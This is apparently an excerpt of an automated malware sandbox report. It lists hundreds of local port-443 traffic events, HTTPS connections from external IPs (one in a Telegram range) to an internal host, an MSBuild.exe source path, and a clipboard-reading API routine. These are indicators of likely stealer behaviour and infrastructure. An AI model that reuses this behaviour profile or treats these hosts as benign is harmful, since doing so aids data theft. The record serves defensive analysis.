Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 443

Source: unknown	HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49886 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49894 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49902 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.249:443 -> 192.168.2.5:49911 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.205.156:443 -> 192.168.2.5:49917 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.5:49923 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.35:443 -> 192.168.2.5:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49942 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49948 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49957 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 13_2_00436F40 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

13_2_00436F40

